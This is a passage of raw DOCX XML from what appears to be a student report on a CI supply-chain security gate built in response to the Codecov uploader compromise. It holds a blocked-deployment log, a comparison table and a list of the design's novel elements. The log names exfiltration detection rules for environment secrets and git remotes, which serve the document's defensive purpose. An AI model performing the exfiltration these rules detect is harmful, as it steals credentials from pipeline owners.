      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  FAIL  security_policy      content scan found exfiltration pattern(s): EXFIL_ENV, EXFIL_GIT_REMOTE, ...</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  RESULT: HASH_MISMATCH   (2.86 ms)</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  DECISION: BLOCK (HASH_MISMATCH) - security event raised</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="40" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3863077"/>
            <wp:docPr id="8" name="Picture 8"/>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5580000" cy="3863077"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 7.2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Security gate dashboard: deploy/block counters, security events and hash-chained audit trail</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>CHAPTER 8</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>INNOVATION AND APPLICATION RELEVANCE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>8.1 Beyond a Basic Hash Checker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 8.1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Comparison with standard fixes</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2608"/>
        <w:gridCol w:w="1927"/>
        <w:gridCol w:w="1814"/>
        <w:gridCol w:w="2608"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Capability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Checksum file</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Signature only</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Proposed system</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Detects modified artifact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Only if checksum is authentic and checked</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Yes (hash + two signatures)</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Survives registry compromise</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Yes</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Key rotation / revocation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Usually manual</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Root-signed trust policy, automatic</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Blocks replay of old or vulnerable versions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Revoked list, minimum version, anti-rollback</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Build provenance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Signed provenance, approved builders and repositories</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Stolen-key defence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>MFA signing, content scan, revocation, audit</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Automatic enforcement in CI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Manual</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Often manual</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Fail-closed gate with security events</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Tamper-evident evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Hash-chained audit log + dashboard</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Codecov's own remediation for its newer uploader included publishing a signed checksum file for customers to verify. That is an important step, but it still relies on each customer choosing to run the check. The proposed system makes verification </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>mandatory, automatic and policy-driven</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>, and it adds revocation, anti-replay and provenance, which a signature alone does not provide.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>8.2 Novel Elements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Continuous Software Supply-Chain Security Gate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: one policy enforced from build to deploy (build → hash → sign → provenance → publish → verify → key status → artifact status → deploy); any violation stops the pipeline and generates a security event.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Two-tier root-signed trust policy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> with key status, revoked versions, minimum versions, a monotonic version number and expiry, protecting against key compromise, replay and freeze attacks, in the spirit of TUF [12].</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Dual-sided defence against the exact Codecov payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: the same exfiltration rules run before signing (vendor) and before deployment (customer), so even an artifact signed with a stolen key carrying the payload is blocked.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Hash-chained transparency/audit log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> covering every signing operation, including denied attempts, and every decision, with a dashboard for operators.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Domain-separated signatures</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> over canonical JSON, preventing cross-protocol signature reuse.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>8.3 Industry Alignment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
